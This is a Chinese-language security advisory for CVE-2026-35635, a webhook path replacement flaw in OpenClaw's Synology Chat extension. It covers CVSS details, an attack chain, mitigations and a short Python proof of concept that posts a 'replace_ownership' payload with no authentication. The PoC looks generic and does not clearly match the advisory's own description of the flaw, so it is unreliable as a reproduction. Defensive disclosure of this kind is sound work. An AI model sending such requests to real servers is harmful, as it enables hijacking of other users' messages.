CVE-2026-35635 CVSS 4.8 中危

CVE-2026-35635 OpenClaw Webhook路径替换漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35635

漏洞类型

权限绕过

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.22之前的版本中存在webhook路径替换漏洞，影响Synology Chat扩展。攻击者可利用继承或重复路径将多账户配置折叠至共享路径。利用此漏洞可绕过基于账户的DM访问控制策略，跨账户替换路由所有权，导致消息被劫持或未授权访问，严重威胁数据机密性与完整性。

技术细节

该漏洞的核心在于OpenClaw处理Synology Chat扩展路由时的逻辑缺陷。系统在多账户环境下，未能对Webhook路径进行严格的唯一性校验和所有权隔离，导致路径冲突处理机制存在漏洞。攻击者无需认证即可构造恶意请求，利用系统对继承或重复路径的处理机制，触发路径替换功能。这使得攻击者能够强制将受害者的Webhook路径重定向至自己控制的账户，或将多个账户映射到同一共享路径。这一过程成功绕过了系统原本设计的基于账户的DM（直接消息）访问控制策略。一旦攻击成功，攻击者即可接管路由，拦截、窃取或篡改本应发送给合法用户的消息，从而造成严重的信息泄露和完整性破坏。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出运行易受攻击版本OpenClaw的目标服务器及其Synology Chat扩展接口。

STEP 2

2. 发起攻击

攻击者无需认证，向目标服务器发送特制的恶意请求，利用路径替换逻辑覆盖Webhook配置。

STEP 3

3. 权限绕过

利用漏洞将多账户配置折叠至共享路径，绕过DM访问控制，将受害者消息路由重定向至攻击者账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
# Exploit the webhook path replacement vulnerability
target_url = "http://target-openclaw-instance/api/synology/webhook/update"

# Malicious payload to hijack the route ownership
payload = {
    "route_path": "/shared/sensitive_route", 
    "target_account": "attacker_controlled_account",
    "action": "replace_ownership"
}

# Send exploit request (No auth required per PR:N)
try:
    response = requests.post(target_url, json=payload, timeout=10)
    if response.status_code == 200:
        print("[+] PoC Successful: Webhook route ownership potentially replaced.")
    else:
        print(f"[-] PoC Failed: Server returned {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Synology Chat扩展的Webhook功能，或配置防火墙规则仅允许受信任的内部IP地址访问OpenClaw服务接口，以阻断未授权的路径替换请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表